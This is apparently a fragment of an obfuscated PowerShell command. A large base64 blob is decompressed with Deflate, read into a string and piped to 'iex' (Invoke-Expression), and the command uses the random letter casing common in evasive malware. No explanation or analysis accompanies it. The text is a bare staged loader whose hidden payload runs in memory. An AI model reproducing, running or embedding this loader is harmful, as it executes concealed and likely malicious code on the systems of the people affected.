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' ) , [sYsteM.iO.CoMpResSion.COmpresSionmoDe]::dECoMpresS ) |fOrEach-ObJEcT { NeW-object iO.sTREaMreaDeR( $_ ,[sYsteM.tEXT.encODiNG]::aSCiI ) } ).READtOeND()| ieX
8 |
--------------------------------------------------------------------------------